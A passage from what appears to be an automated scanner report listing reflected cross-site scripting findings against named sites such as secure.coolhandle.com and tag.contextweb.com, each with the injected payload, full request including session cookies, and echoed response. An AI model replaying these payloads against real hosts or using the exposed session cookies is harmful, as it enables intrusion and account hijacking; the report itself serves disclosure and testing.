S5CkyEIqZbkE5N4BDovA0bs0vLR8diqAiO12sv249SEi9T8YYfDFrAVtFne37-S8b6b8_zrRSm0Pn_iwZp5Njl1Ctpg-Y8MZ4iEuMM8h57h7sA40WqZv-4bpri7csL2Eha5MQmjlPbOzOgtl-6l2XpIhjxu24jEU-jOAKLeLr8pheLZ-qYOggCRZRzxBfMYedtI1f77e2n42rcO7SrM0VQPxYEPmgvy-5sxMT-JXr-g2mztPqvTmnqVETUDUDPzbGpX7rA2wO8p2W1d8jJh9Wgn5fQv_uySNMh5ni7dKMT_qlR38hdCL1cJUSjCa6-qS_S-29zjxGrVJzGjilqbfEkblssZ3oY8EBiTaXzLFtyqqBeor7c8lwYqgvOkdv7T9_7l0B_Epu2spdJD4h6srOYOyvPs-cbWt3Zsh03akXwoACfppvlMTRqhvXWsl2fX0MhUevEGq1iNRzaKvd2XK6i1aN_2f2T_joajRqNC2KFBlwaF-qXHEx7n0l8K5AqGkS2zWZAZsF6nB55Y-VWuh8k6sEdq2OLdTG1Gbl2PHH_MoRk6zbQBZT5wF4bk7NkJmustC7KfRHZkja4jwEjLaHhlg7ZUy9vbeaGjpbb28szQXKPl5sWT_iHlCQFplL5g_xAwZZxozQ-vwjBbTKEOR4EClMFKBR7NeyYw5CdFipM4nWYHDpnm_yCk_BXR62GHnDChO7-X0Yxrune2xG-PTuWOxbQ3iHJMqt1A83xKmmTpf1YhIPQubDCvHxB0Aj59dKNWd1PyhyVvb3_Imo3z4jO4Q_3rN-08zinn8vOajT3qjsF6G3eK8GfPeHCjDxdpQTpQ; uid=8392341830659049202

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:03:42 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:03:42 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=3573749032740515380&fpid=4&nu=n&t=&sp=34084"><script>alert(1)</script>890b9545dd4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.219. https://secure.coolhandle.com/cart.php [domainoption parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.coolhandle.com
Path:   /cart.php

Issue detail

The value of the domainoption request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc594'%3balert(1)//d6576d9822c20d453 was submitted in the domainoption parameter. This input was echoed as fc594';alert(1)//d6576d9822c20d453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cart.php?a=add&pid=9997177&o=billingcycle&billingcycle=monthly&domainoption=owndomainfc594'%3balert(1)//d6576d9822c20d453&sld%5B0%5D=&tld%5B0%5D=.com&sld%5B1%5D=&tld%5B1%5D=.com&sld%5B2%5D=&tld%5B2%5D=&sld%5B3%5D=&x=68&y=1 HTTP/1.1
Host: secure.coolhandle.com
Connection: keep-alive
Referer: https://secure.coolhandle.com/cart.php?a=add&pid=9997177
Cache-Control: max-age=0
Origin: https://secure.coolhandle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __cfduid=d20394667c3c8a4138507d234177080ae1300907582; __utmz=143175079.1300907637.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143175079.1962694896.1300907637.1300907637.1300907637.1; __utmc=143175079; __utmb=143175079.5.10.1300907637; PHPSESSID=92fd1669a5fdf217a1316416894dbbad

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:15:01 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 8772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
mentById('transfer').style.display='none';
document.getElementById('owndomain').style.display='none';
document.getElementById('subdomain').style.display='none';
document.getElementById('selowndomainfc594';alert(1)//d6576d9822c20d453').checked='true';
document.getElementById('owndomainfc594';alert(1)//d6576d9822c20d453').style.display='';
</script>
...[SNIP]...

1.220. https://secure.coolhandle.com/other/contactform_orderform.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.coolhandle.com
Path:   /other/contactform_orderform.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a8dc"><script>alert(1)</script>33e6208caae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/contactform_orderform.php/2a8dc"><script>alert(1)</script>33e6208caae HTTP/1.1
Host: secure.coolhandle.com
Connection: keep-alive
Referer: https://secure.coolhandle.com/cart.php?a=add&pid=9997177
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __cfduid=d20394667c3c8a4138507d234177080ae1300907582; __utmz=143175079.1300907637.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143175079.1962694896.1300907637.1300907637.1300907637.1; __utmc=143175079; __utmb=143175079.5.10.1300907637; PHPSESSID=92fd1669a5fdf217a1316416894dbbad

Response

HTTP/1.1 200 OK
Date: Wed, 23 Mar 2011 19:14:23 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 2984
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form method="POST" action="/other/contactform_orderform.php/2a8dc"><script>alert(1)</script>33e6208caae">
...[SNIP]...

1.221. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a852e"%3balert(1)//cecb5ae80be was submitted in the action parameter. This input was echoed as a852e";alert(1)//cecb5ae80be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWADa852e"%3balert(1)//cecb5ae80be&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -1561381710
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWADa852e";alert(1)//cecb5ae80be";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

1.222. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cbfc"%3balert(1)//0e17effbbec was submitted in the cwadformat parameter. This input was echoed as 9cbfc";alert(1)//0e17effbbec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X2509cbfc"%3balert(1)//0e17effbbec&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 657184314
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X2509cbfc";alert(1)//0e17effbbec";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

1.223. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c0f"%3balert(1)//2577733fa41 was submitted in the cwheight parameter. This input was echoed as c4c0f";alert(1)//2577733fa41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250c4c0f"%3balert(1)//2577733fa41&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 2137648101
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250c4c0f";alert(1)//2577733fa41";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

1.224. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80c4"%3balert(1)//a8fe3b60eb9 was submitted in the cwpid parameter. This input was echoed as e80c4";alert(1)//a8fe3b60eb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848e80c4"%3balert(1)//a8fe3b60eb9&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 2109950108
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848e80c4";alert(1)//a8fe3b60eb9";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase(
...[SNIP]...

1.225. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 546d5"%3balert(1)//f902321b92e was submitted in the cwpnet parameter. This input was echoed as 546d5";alert(1)//f902321b92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1546d5"%3balert(1)//f902321b92e&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -923268318
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1546d5";alert(1)//f902321b92e";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

1.226. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 516e7"%3balert(1)//c92b78f2bd9 was submitted in the cwrun parameter. This input was echoed as 516e7";alert(1)//c92b78f2bd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200516e7"%3balert(1)//c92b78f2bd9&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 820981377
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200516e7";alert(1)//c92b78f2bd9";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

1.227. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid